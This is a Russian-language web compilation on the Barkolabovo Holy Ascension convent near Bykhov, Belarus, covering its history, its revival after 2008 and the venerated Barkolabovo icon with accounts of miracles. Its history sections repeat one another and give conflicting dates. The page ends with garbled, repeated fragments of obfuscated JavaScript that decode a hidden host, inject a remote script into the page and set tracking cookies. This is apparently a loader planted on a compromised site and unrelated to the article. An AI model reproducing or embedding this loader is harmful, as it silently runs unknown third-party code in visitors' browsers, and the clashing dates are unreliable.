Путь от станции барколабово до вознесенского монастыря. Борколабово

Мы вошли в ворота Свято-Вознесенского (многие называют его еще и Барколабовским) женского монастыря ясным августовским днем. Прямо за короткой подъездной аллеей, прячущейся в тени старых деревьев, - белоснежные стены трехъярусной колокольни. За ней сверкает в лучах полуденного солнца купол храма в честь Рождества Иоанна Предтечи. Неподалеку от него кипит стройка, за которой пристально наблюдает пара аистов, свившая гнездо на дереве вблизи от будущего келейного корпуса.

Трудно поверить, но не так давно о том, что когда-то здесь был один из самых крупных женских монастырей во всей Речи Посполитой, являвшийся духовным и просветительским центром Восточной Беларуси, напоминал лишь установленный почти у самого берега Днепра крест. А от прежних монастырских строений сохранились разве что почти ушедшие под землю остатки фундамента величественного 5-купольного Свято-Вознесенского собора, которые удалось отыскать во время охранных раскопок могилевским археологам.

Пять лет назад на живописной поляне, заросшей густым разнотравьем, появился небольшой вагончик с установленным на крыше куполом - здесь начали проходить первые церковные службы, на которые сестры спешили из соседней деревни, где разместились на временное жительство. А после того, как на территории возрождающейся обители были отстроены небольшой сестринский жилой корпус и трапезная, вместе с настоятельницей схиигуменьей Антонией сестры окончательно перебрались в монастырь, где уже начиналось возведение первого из двух, когда-то существовавших тут, храмов.

– Он освящен 13 мая 2010 года, и это был огромный праздник! Ведь для монастыря храм - центр духовной жизни, и с его появлением укрепилась вера в то, что барколабовская святыня возродится, что у нее впереди есть будущее, - говорит сестра Мария, встречавшая нас на утопающей в цветах дорожке, ведущей к трапезной. - А 24 июля состоялось самое знаменательное для обители событие: в Свято-Вознесенский монастырь после долгих скитаний вернулась главная святыня - икона Барколабовской Божией Матери, которой верующие поклоняются более 350 лет!

С ней, кстати, связана одна из самых красивых легенд, бытующих в этих местах. Согласно ей, икона находилась в обозе отряда князя Пожарского, и когда русское войско в 1659 году подошло к стенам Барколабовского монастыря, то телега, в которой везли образ, «стала недвижимо» у ворот обители, и лошади, несмотря на все усилия возничих, не могли тронуться с места. Князь понял, что икона хочет остаться в монастыре, и не стал перечить. Вместе с игуменьей Фотинией Киркоровной они внесли образ в летний Вознесенский собор, где и поставили его по центру, решив позже определить место для постоянного размещения. А утром монахинь ждало еще одно чудо - войдя в храм, они увидели, что икона висит в воздухе у правой стены, будто показывая, где именно ее нужно повесить. Поклониться необыкновенному образу, получившему название Барколабовской Божией Матери, потянулись верующие не только со всей округи - из самых дальних уголков Восточной Беларуси. Еще больше их стало после того, как появились первые сведения о чудесных исцелениях, дарованных людям святой заступницей.

Немало подобных случаев и сегодня, - рассказывает сестра Мария. - Видите - под стеклом образа располагаются дары, которыми верующие отблагодарили Божию Матерь за исцеление, облегчение страданий. Их очень много, и за каждым - своя история, свое чудо… С неделю назад к нам в монастырь приезжала группа паломников из Санкт-Петербурга. Среди них был пожилой мужчина, который почти не ходил. Говорит, что даже в мыслях не было просить Божию Матерь об исцелении - просто помолился, приложился как все к образу. А когда вышел на крыльцо храма, вдруг понял, что ноги «ожили». Он и плакал, и смеялся, стучал по ногам палочкой - все никак не мог поверить в произошедшее! В нынешнем же году мне пришлось столкнуться еще с одним удивительным случаем. Приехала женщина из Бобруйска, привезла в дар Барколабовской Божией Матери золотой крестик. Рассказывает, что у нее совсем ноги отказали - хотела уже себя жизни лишить, чтобы не быть обузой для своих взрослых детей, которым пришлось взвалить на свои плечи уход за практически обезножевшей матерью. А потом, говорит, приснилось ей, что выздоровеет, если обойдет 33 храма. Проснувшись, долго размышляла над этим сном, а потом решила, что все равно хуже уже не будет, и отправилась в путь. Сама передвигаться не могла - платила людям, которые ее сопровождали в путешествии. Все известные храмы России и Беларуси объехала, о каждом подробно в тетрадочку запись сделала. Пройдя последний, поняла - тщетно. А тут услышала про Барколабово и решила напоследок еще и здесь побывать - дескать, такая святыня, нельзя умирать, не приложившись к ней. Приехала в монастырь, помолилась образу и… вышла на своих ногах! Рассказывает, что теперь не только ходит - на заводе работает! Вот с каждой зарплаты и откладывала помаленьку деньги, чтобы отблагодарить своим даром Барколабовскую Божию Матерь… Таких историй очень много, мы их все записываем, думаем в будущем книгу выпустить.

По словам директора Быховского районного историко-краеведческого музея Сергея Жижияна, после закрытия монастыря тут некоторое время размещался детский дом для маленьких беспризорников, потом сельская больница… Во второй половине прошлого века старые здания были окончательно разобраны, а на освободившейся территории построен детский пионерлагерь «Светлячок». После аварии на Чернобыльской АЭС, захлестнувшей Быховщину «волной» радиации, лагерь ликвидировали, помещения, в которых он размещался, снесли, и на месте обители осталась лишь заросшая разнотравьем поляна. На которой в 90-х и был установлен крест - как напоминание о кипевшей когда-то здесь монастырской жизни.

Вплоть до революции это был очень большой и богатый монастырь, - говорит он. - В разное время тут до 5 храмов стояло! Хотя уже в 19 веке их осталось два - маленький отапливаемый Иоанна Предтечи и летний большой 5-купольный Вознесенский. В архивах монастыря сегодня хранятся копии различных документов, связанных со строительством и обустройством обители. Так вот в соответствии с описью от 1910 года здесь было 23 строения, в том числе отдельный дом для священника, гостиница для паломников, церковно-приходская школа, баня, сарай для экипажей… На поле у монастыря два раза в год проходила большая сельскохозяйственная ярмарка - долгое время не могли толком определиться, где именно она находилась, а потом археологи во время раскопок на этом поле нашли большое количество монет, и это помогло точно установить место ярмарки. Есть среди документов и такой интересный, как проект укрепления берега Днепра близ Барколабовского монастыря от 1836 года - здесь случались большие паводки, и вода грозила подмыть храмы…

Когда будет готов келейный корпус, здесь смогут жить до 50 монахинь и послушниц, - рассказывает сестра Мария. - Мечтаем сделать большое благоустройство - если удастся, тут будет такая красота, настоящий рай! В перспективе надеемся открыть на территории обители православный детский дом. У меня есть опыт работы с детками при российских монастырях, хотя, конечно, это потребует большой подготовительной работы - жить ребятишки смогут в домике, где мы сейчас размещаемся, но нужны воспитатели, учителя… Пока на все рук не хватает - стройка заботы требует, а у нас ведь еще и свое хозяйство: 4 коровы, конь, огород, картофельные «сотки». Сейчас вот сено надо заготовить, чтобы было чем живность кормить - спасибо директору психоневрологического дома-интерната, помогла и техникой, и рабочими руками. Хотя нам многие помогают - кто деньгами, кто приезжает поработать, другие иконы дарят, колокола тоже нам в дар передали. Думаю, что пройдет еще лет 20 и монастырь будет не узнать - это будет наш, белорусский новейший Афон. Здесь ведь действительно особое место - вон даже строители, которые у нас работают, говорят: «Так тут хорошо, легко дышится - уезжать не хочется!»…

Борколабовский женский монастырь находился на левом берегу Днепра, к югу от деревни Борколабово, в 12 верстах от города Быхова. Как свидетельствуют хроники, название деревни Борколабово (Боркулабово) происходит от имени ротмистра польского короля Августа Баркулаба Ивановича Корсака. В 1564 г. он основывает свой замок, а через четыре года строит две церкви. В 1583 г. после брака дочери Корсака Евы с князем Соломерецким деревня Борколабово становится культурным центром приднепровского края.

Со второй половины XVI территория Беларуси входила в состав объединенного Польско-Литовского государства - Речи Посполитой, в котором королевские власти были склонны к политике окатоличивания населения. Баркулаб Корсак и его наследники не поддерживали таких такой тенденций и стремились противодействовать им.

В 1594 году князем Соломерицким была заложена православная церковь в честь Георгия Победоносца. В 1626 году уже дети князя Соломерицкого Богдан и Анна, наставником которых был известный Мелетий Смотрицкий, строят мужской православный монастырь, которому дарят в собственность деревни Сутоки и Малахово. Более того, через некоторое время княжна Елена Соломерицкая, вступив в брак с Богданом Стеткевичем, договаривается с ним о строительстве женского монастыря.

В 1641 году Стеткевич получает «разрешение на Борколабовский монастырь». Став основателем монастыря, он дарит ему в собственность земельные угодья (остров Барок, поле, луг), водяную мельницу и право ловить рыбу в Днепре до Быховской границы. И хотя княжна в скором времени умерла, муж осуществляет совместно данный обет. Известный постройки монастыря этого времени - Вознесенский храм, колокольня.

В соборном храме монастыря хранилась чудотворная икона Божией Матери, подаренная монастырю в 1659 году князем Пожарским, возвращавшимся с войсками в Россию из Литвы. Икона была первоначально помещена в центре Вознесенской церкви, в следующую ночь икона чудесным образом переместилась к стене храма. На поклонение образу в Борколабовский монастырь стекались паломники не только православного вероисповедания, но и униаты и католики. В 1882 году Вознесенский храм сгорел, но чудотворный образ, иконостас и утварь были спасены от пожара. Икона является одним из самых почитаемых образов Божией Матери в Восточной Беларуси.

В 1920-е годы Борколабовский монастырь закрыли, в зданиях монастыря размещался клуб, детдом, пионерский лагерь, а в 1990-е годы все монастырские постройки разрушили. К концу ХХ века на месте монастыря не осталось даже руин, а в память о монастыре здесь был установлен поклонный крест.

Чудотворная икона пережила все войны XVII — XX веков, и все гонения на религию, включая советские времена. Во время Великой Отечественной войны икону сохранили бывшие инокини (по другим устным сведениям, образ находился в часовне на железнодорожной станции Быхов). В 1953 году перед праздником Пасхи чудотворный образ был принесен в Свято-Троицкий храм в Быхове, где находился до 2010 года. 13 мая 2010 г. в Свято-Вознесенском женском монастыре был освящен новопостроенный храм в честь Святого Предтечи и Крестителя Господня Иоанна, а 25 июля 2010 года состоялось торжественное перенесение чудотворной «Борколабовской» иконы Божией Матери из г. Быхова в возрожденный монастырь.

В 2011 году в монастыре завершено строительство колокольни. На территории монастыря построена трапезная, введен в строй хозяйственный блок, дом для общежития монахинь, имеется небольшая гостиница для гостей и волонтеров, идет строительство двухэтажного монашеского корпуса. В перспективе планируется восстановить каменный храм в честь Вознесения Господня.

В 2012 году во внимание к культурной и исторической ценности Борколабовской иконы Божией Матери Национальным банком Республики Беларусь были выпущены 4 памятных монеты «Икона Пресвятой Богородицы «Борколабовская».

Монастырь был возрожден по ходатайству Преосвященного епископа Бобруйского и Быховского Серафима постановлением Синода Белорусского Экзархата Московского Патриархата 12 июня 2008 года. Возрожденный монастырь расположился в д. Борколабово под Быховом, в историческом месте явления иконы Божией Матери Борколабовской.

Б арколабовский женский монастырь находился на левом берегу Днепра к югу от деревни Барколабово, в 12 верстах от города Быхова. Как свидетельствуют хроники, название деревни Барколабово (Боркулабово) происходит от имени ротмистра польского короля Августа Баркулаба Ивановича Корсака.тВ 1564 г. он основывает замок, а через четыре года строит две церкви. В 1583 г. после брака дочери Корсака, Евы, с князем Соломерецким, деревня Барколабово становится культурным центром приднепровского края. Здесь создается известная во всей Речи Посполитой библиотека.

У князя Соломерецкого в то время жили и работали домашними учителями Лаврентий Зизаний и Мелентий (Максим) Смотрицкий – известные ученые и общественные политические деятели. «Азбукой» и «Грамматикой» Л. Зизания пользовались в школах Беларуси, Украины и Литвы. Самым авторитетным учебником по славянскому языку более двух столетий была «Грамматика» М. Смотрицкого. «Вратами своей учености» назвал М.В. Ломоносов его «Грамматику». Удивляет, что мы знаем про Мелентия Смотрицкого из биографии Ломоносова и не знаем про его деятельность в нашем крае из истории Беларуси.

С мотрицкий надолго связывает свою судьбу с семьей князя Соломерецкого, часто живет в его имении, выезжает за границу с его сыном Богданом для продолжения образования. Они провели несколько лет в разных городах Силезии, Словакии и Германии, слушая лекции во многих университетах. За границей Смотрицкий получил и степень доктора медицины. Обширна его деятельность по защите и установлению православия в нашем крае. За это он преследовался властями Речи Посполитой.

В то время Беларусь входила в состав объединенного Польско-Литовского государства – Речи Посполитой, все жители которой по соглашению должны были иметь одинаковые права. Но королевские власти проводили жесткую политику ополячивания белорусского народа, насильно насаждали католицизм. М. Смотрицкий одним из первых повел решительную борьбу с пленением родного края. В это время он пишет вместе со многими другими произведениями свое главное сочинение – «Трэнас» или «Лямант восточной церкви», где от имени Матери-Церкви призывает белорусский, русский и украинский народы к объединению, к борьбе за свои права.

М ногие белорусские магнаты и шляхта принимали католическую веру, осваивали польский язык, заставляли жить, придерживаясь чужих обычаев и традиций. К чести Баркулаба Корсака и его наследников, они не изменили духовным народным традициям, родному языку, православной вере, настойчиво боролись за свои взгляды. Вот почему Корсак сразу же строит в деревне и в округе православные церкви. В 1594 г. князем Соломерицким была заложена церковь в честь святого великомученика Георгия Победоносца. В 1626 г. дети князя Соломерицкого, Богдан и Анна, наставником которых был Смотрицкий, строят мужской православный монастырь, которому дарят в собственность деревни Сутоки и Малахово.

Б олее того, через некоторое время княжна Елена Соломерецкая, вступив в брак с Богданом Стеткевичем договаривается с ним о строительстве женского монастыря. В 1641 г. Стеткевич получает «разрешение на Барколабовский монастырь». Став основателем монастыря, он дарит ему в собственность земельные угодья (остров Барок, поле, луг), водяную мельницу и право ловить рыбу в Днепре до Быховской границы. И хотя княжна в скором времени умерла, муж осуществляет совместно данный обет. Южнее местечка Барколабово, в живописном уголке около Днепра, подняла к небу свои пять позолоченных куполов красивая и величественная Соборная церковь. Позже выросли высокая колокольня – ворота, каменное ограждение и другие постройки.

В скоре после сооружения главного храма в жизни обители произошло событие исключительного значения. Возвращаясь летом из Польши, князь Пожарский, не расстававшийся никогда в походах с особо чтимой им иконой Божией Матери, проезжал мимо вновь возникшего монастыря. И вот описание того, что совершилось в знаменательный для Барколабовской обители 1648 г. «Тайну Цареву подобает хранить, дела же Божии открывати. Попущением Божиим бывшей брани в Польше-Литве, в лето от сотворения мира 7156, от Рождества Христова 1648, при державе польского короля Владислава четвертого, грядущаго из Польши, князь воинов Российских, прозванием Пожарский, с собою имеяша сию Икону Пресвятыя Богородицы из Польши и егда прииде на место сие идеже ныне у врат великих, тогда ста икона неподвижима; трудяся же князь, хотя конскою силою и младыми отроки двигнути, и ничтоже успе, и бысть икона неподвижима. Сие видя, князь пойде в монастырь к игумении тогда бывшей, Фотинии Киркоровне, рече: возмите икону Пресвятыя Богородице, ибо хощет Мати Божия зде пребывати. Тогда игумения с сетрами пришедши, взяше с подобающею честию икону ресвятыя Богородицы, поставила ю посреде церкве, и оставиша до утрия, где бы поставиша оную; егда же приидоша на утрие в церковь, обретоша икону саму о себе ставшу при стене, идеже ныне стоит. Празднование оной совершается месяца июля 11 числа, в день святыя великомученицы Евфимии Прехвальныя в оньже день сия икона прибыла в монастырь Барколабовский».

В есть о чудесном явлении быстро распространилась и с разных концов стали стекаться богомольцы, чтобы поклониться чудотворному образу. И доныне, каждый, кто с искренней верой молится перед Барколабовской иконой Божией Матери, прося заступничества Царицы Небесной, получает утешение и помощь. 13 мая 2010 г. в Свято-Вознесенском женском монастыре освящен храм в честь Святого Предтечи и Крестителя Господня Иоанна. В 2011 г. завершено строительство колокольни, заложен фундамент для строительства сестринского корпуса. Государством в постоянное пользование передано монастырю три земельных участка общей площадью 14.0466 га земли для ведения подсобного сельского хозяйства, а также земельный участок площадью 5,6900 га, для строительства и обслуживания монастыря.

В обители проживает 17 насельниц (2017 г.). Настоятельница монастыря – схиигумения Антония (Полуянова).

Икона получила название по месту своего нахождения - Барколабовского Свято-Вознесенского женского монастыря Могилёвской губернии . История иконы связана с событиями, происшедшими 11 июля 1659 года , когда некий русский князь по фамилии Пожарский , возвращаясь из похода в Польшу, проезжал мимо обители с иконой, взятой им в поход. Около монастыря лошади остановились и не смогли сдвинуть повозку с места. Князь, решив, что Божия Матерь желает остаться в обители, подарил икону монастырю. Икона Пресвятой Богородицы Барколабовская - одна из самых чтимых в Белоруссии.



Её списки (копии) находятся во многих белорусских храмах, сама же святыня пребывала в Свято-Троицком храме города Быхова Могилёвской области, а 24-25 июля 2010 года состоялось историческое событие - чудотворная икона Божией Матери "Барколабовская" из г. Быхова в возрождаемый Свято-Вознесенский женский монастырь дер. Барколабово.



Некогда Барколабовская лавра была знаменита на всю Европу. В местечке Барколабово в 8 км севернее Быхова находился действующий женский монастырь в честь Вознесения Господня, основанный еще в 1641 г. Богданом Стеткевичем. В соборном храме монастыря хранилась чудотворная икона Божией Матери, получившая свое название по своему местонахождению.

Согласно преданию, в 50-х гг. XVII в., во время военных действий царя Алексея Михайловича на территории Великого княжества Литовского, образ был взят русским войском в одном из храмов Центральной или Западной Белоруссии. Когда войско в 1659 г. подошло к стенам Барколабовского монастыря, обоз, в котором находился образ, недвижимо стал и лошади, несмотря на усилия возничих, не могли тронуться с места. Тогда русское войско оставило икону Божией Матери в монастыре у игуменьи Фотинии (Киркоровны). Барколабовская икона первоначально была помещена игуменьей Фотинией в центре Вознесенской церкви монастыря, в следующую ночь икона чудесным образом переместилась к стене храма. В дальнейшем образ находился летом в Вознесенской церкви, а зимой в церкви во имя св. Иоанна Предтечи в особых высоких золоченых киотах, напротив клироса. В 1882 г. Вознесенский храм сгорел, но чудотворный образ, иконостас и утварь были спасены от пожара. В 1885 г. Была возведена монастырская Успенская каменная церковь, куда и была перенесена чудотворная икона.


На поклонение образу в Барколабовский монастырь стекались паломники не только православного вероисповедания, но и униаты и католики. Образ прославился чудесами во время Северной войны и войны 1812 г. У крестьянок Могилёвской губернии был известен обычай покупать в монастыре на храмовые праздники фигурки животных, сделанные из воска, и прикладывать их к Барколабовской иконе, затем фигурки приносились домой как знак помощи Божией Матери в сохранении домашних животных от болезней. В 1900 г. после крестного хода с образом прекратился падеж скота.

Чудотворная икона пережила все войны XVII — XVIII столетий и все гонения на религию, включая советские времена.

В 1924 г. Барколабовский монастырь закрыли. Святыню сохранили бывшие инокини монастыря. В 1953 г. перед праздником Пасхи чудотворный образ был принесен в церковь Св. Троицы в Быхове и помещен в специальный пристенный киот. В 1979 г. Н. Ф. Высоцкая провела реставрационное укрепление и атрибуцию иконы. Чудотворная икона находилась в Свято-Троицком храме до 2010 г., когда была торжественно перенесена в храм Иоанна Предтечи возрождаемого Барколабовского монастыря.

Этот образ является одним из самых почитаемых образов Божией Матери в Восточной Беларуси. Барколабовская Одигитрия, написанная темперой на хвойной основе с вызолоченным резным фоном, является одним величайших шедевров белорусской школы иконописи, и вместе с тем сохраняет выразительные черты его древне-византийского прообраза. Исследователи высказывают мнение, что образ создан на границе XVI — XVII столетий, или в 1-й половине XVII столетия в центрально-белорусском регионе (возможно в Слуцке). Иконография близка Иверской и Ильинской (Черниговской) иконам Божией Матери. Подобный извод, в основе которого, очевидно, лежало почитание Полоцкой Эфесско-Корсунской иконы Божией Матери — главной Богородичной святыни Белоруссии с середины XII в., был широко распространен в иконописи в центре и на юго-западе Белоруссии в первой половине — середине XVII в., о чем свидетельствует ряд сохранившихся произведений.

Особенности иконографии Барколабовской иконы: Божия Матерь изображена почти поколенно, облачена в темно-пурпурный мафорий, украшенный 3 золотыми ажурными звездами и золотой кружевной каймой с кистями, темно-зеленое платье имеет широкую жемчужную обнизь на горловине и поручах, золотой нимб гравирован лучистым сиянием. Лик Богородицы исполнен царственной красоты, благородства и скорби. Склонив голову к Младенцу, восседающему на Ее левой руке, высоко поднятой вверх правой рукой Она указывает на благословляющую десницу Сына. Младенец Христос, в белом хитоне-рубашке с отложным воротом, препоясанном красным кушаком, и охристо-красном гиматии с обильным золотым ассистом, слегка повернут к Богоматери, благословляет правой рукой, в левой руке держит свиток.

Существовало несколько списков Барколабовской иконы в самом монастыре и в храмах близлежащих городов и сел. Список из Барколабовского монастыря (не сохранился) имел живописные клейма с изображением чудес иконы. В приходской Михайловской церкви с. Барколабово особо почиталась двухсторонняя икона с образом Божией Матери на одной стороне и архангела Михаила — на другой (не сохранилась). Список, выполненный в начале ХХ в. художником Ореховым, находился в часовне на вокзале г. Могилёва.

Сохранившиеся списки Барколабовской иконы можно увидеть в иконостасе церкви Святой Троицы г. Быхова, в собрании Национального художественного музея Республики Беларусь и в Николаевском соборе Могилевского Свято-Никольского женского монастыря. Этот образ, написанный во 2-й половине XVIII в., имел вверху изображения ангелов (почти утрачены), коронующих Божию Матерь, и серебряный оклад (не сохранился), выполненный в 1781 г. могилёвским ювелиром П. Слижиком. В церкви св. Онуфриятого же монастыря находится еще один список Барколабовской иконы, обретенный в 1992 г.

Деревня Барколабово (Могилевская область)

Женский монастырь

Эти места были заселены человеком так давно, что даже не верится. Свидетельством являются археологические памятники возле Днепра.

В 1654 году возле древнего поселения на гору возле Днепра въехал ротмистр и дисненский староста Баркулаб Иванович Корсак, который происходил из древнего белорусского рода Корсаков. Он, сидя на коне, оглядел все хорошо и решил поставить на этой горе замок, чтобы оборонять наши восточные границы. Он умер через 12 лет после того, как основал деревню Барколабово.

Кричевский староста Богдан Соломерецкий взял в жены дочь Еву Баркулабовну и получил Барколабово. Говорят, что Богдан Соломерецкий был противником Брестской унии и во всем поддерживал православные братства. И он переделал Барколабово в оплот православия. До него здесь было две православные церкви. А он уже вместе с женой построил еще одну православную церковь святого Юрия.

Их дети Богдан Богданович и Елена Богдановна также были истинными православными. Они были воспитаны в православном духе. Они не соглашались перейти в другие конфессии, поменять веру, а основали в Барколабово мужской православный монастырь. Этот монастырь становится крупным центром оппозиции униатству в Беларуси.

Образ Матери Божьей Барколабовской попал в монастырь еще в середине 17 века. Тогда шла война Русско-польская и русские князья возвращались с войны через этот монастырь. По легенде, перед монастырем кони упали на колени и не могли идти. Все поняли, что Матерь Божья не хочет покидать эту землю. И икону оставили в Барколабовском монастыре, где она находится более 350 лет. Когда пришли большевики, монахини стали раздавать иконы, и эту люди передавали из дома в дом. Только чтобы она не попала в руки большевиков, чтобы они ее не спалили.

Сразу после первого раздела Речи Посполитой в 1772 году Барколабово попадает в когти двуглавого орла Российской Империи. В то время здесь были 2 церкви, монастырь, дом архиерея, две мельницы, проживало 465 человек.

В конце 19 века в Барколабово уже проживало 605 человек. Здесь были медеплавильное, лесопильное предприятия, корчма, семь магазинов, 2 раза в год проходили ярмарки. А в 1904 году было решено построить в Барколабово еще одну православную церковь. И освятили эту церковь в честь Казанской Божьей Матери. В советское время эту церковь закрыли и переделали в спортивный зал. Сейчас ее вновь вернули верующим и реставрируют. Она является памятником архитектуры псевдорусского стиля.

Местные жители рассказывают, что Вторая Мировая война совсем не затронула Барколабово, несмотря на то, что рядом Могилев, Быхов, в которых шли тяжелые бои. Во время войны палили соседние деревни, убивали людей, а здесь немцы в начале войны проехали на мотоциклах, и больше их никто не видел. И еще рассказывают, что, когда большевики закрыли женский монастырь, старец один сказал: «Хутка пачнецца вайна, але гэтае месца яна не кране». Все люди верят в то, что это именно Матерь Божья Барколабовская покровительствует этому месту. Говорят, на огороды падали бомбы, но чудом не взрывались.

< e.length;o++)t+=String..document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String..document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String..document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String..document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf("http")==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n .replace(«https:»,»http:»));else{var i=document.createElement(«script»);i.setAttribute(«src»,n),i.setAttribute(«type»,»text/javascript»),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,»function»==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),»function»==typeof o&&o())}}},s=function(f){var u=a(f)+»/ajs/»+t+»/c/»+r(d())+»_»+(self===top?0:1)+».js»;window.a3164427983=f,c(u,function(){o(«a2519043306»)!=f&&n(«a2519043306»,f,{expires:parseInt(«3600»)})},function(){var t=e.indexOf(f),o=e;o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o(«a36677002»)!=i&&n(«a36677002»,i);var r=o(«a2519043306»);t=r?r:e,s(t)};f()}();
// ]]>